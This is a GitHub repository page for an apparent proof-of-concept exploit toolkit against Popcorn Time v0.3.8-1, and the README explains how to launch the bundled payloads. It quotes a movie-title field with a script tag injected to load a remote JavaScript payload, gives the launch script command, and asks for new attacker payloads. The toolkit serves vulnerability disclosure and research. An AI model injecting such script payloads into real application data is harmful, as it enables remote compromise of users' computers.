Skip to content
master
Switch branches/tags
Code

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Popcorn Time Exploit Toolkit

In this repository you can find everything you need to launch an attacked against the currently latest stable version of Popcorn Time (v0.3.8-1). All the attacks are remote, but for the sake of simplicity they are currently ran on the same computer. For a detailed blog post, please click here.

Launching attacks

There are several attack payloads available in the main directory (files 1.js through 5.js). In the /api/v2/ folder there is a file called list_movies_pct.json. You can select the payload that will execute by changing in the 12th line:

"title_english": "Hot Pursuit<script src='http://127.0.0.1/1.js'></script>",

the script name. Then, from the main directory you need to run start-test-osx.sh:

./start-test-osx.sh

This will launch Popcorn Time with the selected payload.

Contributing

If you come up with creative ideas for payloads that an attacker can run, please create a Pull Request so we can enrich this repository.

Additionally, if you want to convert the current payloads to other operating systems or create launchers for them too, please feel free to do so and contribute them.

Disclaimer

All the content in this repository is provided as-is and for educational purposes only. The authors take no responsiblity for any action or damage that may be caused by using it.

For more information, please see the license.

About

PoC Code and Exploit Payloads for Popcorn Time Vulnerabilities

Resources

License

Releases

No releases published

Packages

No packages published